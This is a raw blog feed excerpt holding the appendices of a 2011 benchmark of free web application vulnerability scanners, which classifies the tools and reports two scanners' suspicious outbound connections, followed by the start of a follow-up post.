class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Hexjector&lt;/b&gt; by&lt;b&gt; hkhexon &lt;/b&gt;– also falls into other categories&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;d0rk3r&lt;/b&gt; by &lt;b&gt;b4ltazar&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Deprecated Scanners&lt;/u&gt;&lt;/b&gt; - incomplete tools that were not maintained for a very long time. This list currently includes the following tools (and might include more):&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Wpoison&lt;/b&gt; (development stopped in 2003, the new official version was never released, although the 2002 development version can be obtained by manually composing the sourceforge URL which does not appear in the web site- &lt;a href=&quot;http://sourceforge.net/projects/wpoison/files/&quot;&gt;http://sourceforge.net/projects/wpoison/files/&lt;/a&gt; )&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;De facto Fuzzers&lt;/u&gt;&lt;/b&gt; – tools that scan applications in a similar way to a scanner, but where the scanner attempts to conclude whether or not the application or is vulnerable (according to some sort of “intelligent” set of rules), the fuzzer simply collects abnormal responses to various inputs and behaviors, leaving the task of concluding to the human user. &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Lilith 0.4c/0.6a &lt;/b&gt;(both versions 0.4c and 0.6a were tested, and although the tool seems to be a scanner at first glimpse, it doesn’t perform any intelligent analysis on the results).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Spike proxy&lt;/b&gt; &lt;b&gt;1.48&lt;/b&gt; (although the tool has XSS and SQLi scan features, it acts like a fuzzer more then it acts like a scanner – it sends payloads of partial XSS and SQLi, and does not verify that the context of the returned output is sufficient for execution or that the error presented by the server is related to a database syntax injection, leaving the verification task for the user).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Fuzzers&lt;/u&gt;&lt;/b&gt; – scanning tools that lack the independent ability to conclude whether a given response represents a vulnerable location, by using some sort of verification method (this category includes tools such as JBroFuzz, Firefuzzer, Proxmon, st4lk3r, etc). Fuzzers that had at least one type of exposure that was verified were included in the benchmark (Powerfuzzer).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;CGI Scanners&lt;/u&gt;:&lt;/b&gt; vulnerability scanners that focus on detecting hardening flaws and version specific hazards in web infrastructures (Nikto, Wikto, WHCC, st4lk3r, N-Stealth, etc)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Single URL Vulnerability Scanners&lt;/u&gt;&lt;/b&gt; - scanners that can only scan one URL at a time, or can only scan information from a google dork (uncontrollable).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Havij (by itsecteam.com)&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Hexjector (by hkhexon)&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Simple XSS Fuzzer [SiXFu] (by www.EvilFingers.com)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Mysqloit (by muhaimindz)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;PHP Fuzzer (by RoMeO from DarkMindZ)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;SQLi-Scanner (by Valentin Hoebel)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Etc.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Vulnerability Detection Assisting Tools&lt;/u&gt;&lt;/b&gt; – tools that aid in discovering a vulnerability, but do not detect the vulnerability themselves; for example:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://labs.securitycompass.com/exploit-me/&quot;&gt;&lt;b&gt;Exploit-Me Suite&lt;/b&gt;&lt;/a&gt;&lt;b&gt; (XSS-Me, SQL Inject-Me, Access-Me) &lt;/b&gt;&amp;nbsp;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://xss.codeplex.com/wikipage?title=tutorial&quot;&gt;&lt;b&gt;Fiddler X5s plugin&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;https://chrome.google.com/webstore/detail/kkopfbcgaebdaklghbnfmjeeonmabidj&quot;&gt;&lt;b&gt;XSSRays&lt;/b&gt;&lt;/a&gt;&lt;b&gt; (chrome Addon)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Exploiters&lt;/u&gt; - &lt;/b&gt;tools that can exploit vulnerabilities but have no independent ability to automatically detect vulnerabilities on a large scale. Examples:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;MultiInjector&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;XSS-Proxy-Scanner&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Pangolin&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;FGInjector&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Absinth&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Safe3 SQL Injector&lt;/b&gt; (an exploitation tool with scanning features (pentest mode) that are &lt;b&gt;not available&lt;/b&gt; in the free version).&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Exceptional Cases&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;SecurityQA Toolbar (iSec)&lt;/b&gt; – various lists and rumors include this tool in the collection of free/open-source vulnerability scanners, but I wasn’t able to obtain it from the vendor’s web site, or from any other legitimate source, so I’m not really sure it fits the “free to use” category.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025819&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Ref281064634&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;31. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Appendix C – WAVSEP Scan Logs&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The execution logs, installation steps and configuration used while scanning with the various tools are all described in the following report:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Scan%20Log%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/Scan%20Log%20-%20WAVSEP%20Benchmark%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025820&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Ref281064854&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;32. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Appendix D – Scanners with Abnormal Behavior&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following appendix was published in my previous benchmark, but I decided to include in the current benchmark, mainly because I didn&#39;t manage to invest the time to get to the bottom of these mysteries, and didn&#39;t see any information on someone else that did.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;During the &lt;b&gt;current &amp;amp; previous&lt;/b&gt; assessment, parts of the source code of open source scanners and the HTTP communication of some of the scanners was analyzed; some tools behaved in an &lt;b&gt;abnormal&lt;/b&gt; manner that should be reported:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Priamos IP Address Lookup&lt;/i&gt;&lt;/b&gt; – The tool Priamos attempts to access “whatismyip.com” (or some similar site) whenever a scan is initiated (verified by channeling the communication through Burp proxy). This behavior might derive from a trojan horse that infected the content on the project web site, so I’m not jumping to any conclusions just yet.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;VulnerabilityScanner Remote RFI List Retrieval&lt;/i&gt;&lt;/b&gt; (listed in the scanners that were &lt;b&gt;not&lt;/b&gt; tested, appendix A, developed by a group called RST, &lt;a href=&quot;http://pastebin.com/f3c267935&quot;&gt;http://pastebin.com/f3c267935&lt;/a&gt;) – In the source code of the tool VulnerabilityScanner (a python script), I found traces for remote access to external web sites for obtaining RFI lists (might be used to refer the user to external URLs listed in the list). I could not verify the purpose of this feature since I didn’t manage to activate the tool (yet); in theory, this could be a legitimate list update feature, but since all the lists the tool uses are hardcoded, I didn’t understand the purpose of the feature. Again, I’m &lt;b&gt;not&lt;/b&gt; jumping to any conclusions; this feature might be related to the tool’s initial design, which was not fully implemented due to various considerations.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Although I did &lt;b&gt;not&lt;/b&gt; verify that any of these features is malicious in nature, these features and behaviors might be abused to compromise the security of the tester’s workstation (or to incriminate him in malicious actions), and thus, require additional investigation to disqualify this possibility.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/5660944376278622097/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2011/08/commercial-web-application-scanner.html#comment-form' title='22 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/5660944376278622097'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/5660944376278622097'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2011/08/commercial-web-application-scanner.html' title='Commercial Web Application Scanner Benchmark'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4vupTy7vzj4RmGrUau4i7_lW3jZ4SxXnZRlBR1bhfvVxuXVn_dlqELP3MIOQDNYALeInhj7-PEK-fAURzmv1F1Rb5SXN7CZXWst_WX4i3oZj2baQHtndS_EbFjhsPKxi-fpT9laMRhQ4/s72-c/FeatureCount-Commercial.PNG" height="72" width="72"/><thr:total>22</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-7571530788987583648</id><published>2011-01-25T14:00:00.000-08:00</published><updated>2011-01-26T05:58:52.265-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="benchmark"/><category scheme="http://www.blogger.com/atom/ns#" term="benchmarking"/><category scheme="http://www.blogger.com/atom/ns#" term="conclusions"/><category scheme="http://www.blogger.com/atom/ns#" term="scanner"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><category scheme="http://www.blogger.com/atom/ns#" term="security tools"/><category scheme="http://www.blogger.com/atom/ns#" term="the best web application vulnerability scanner"/><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability scanner"/><category scheme="http://www.blogger.com/atom/ns#" term="web application scanner"/><title type='text'>Myth Breaker - The Best Open Source Web Application Vulnerability Scanner</title><content type='html'>&lt;p class=&quot;MsoNormal&quot;&gt;(The original benchmark post - comparison of 43 web application vulnerability scanners:&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict.blogspot.com/2010/12/web-application-scanner-benchmark.html&quot;&gt;http://sectooladdict.blogspot.com/2010/12/web-application-scanner-benchmark.html&lt;/a&gt;)&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;It’s been a couple of weeks since the initial benchmark was published, and I used that time to contact most of the vendors and to come to some conclusions, as to which tool combinations are ideal for each task;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;I believe that those of you that use these tools on a daily basis will find my conclusions interesting.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;Please note that the conclusions refer to the condition of the tools in 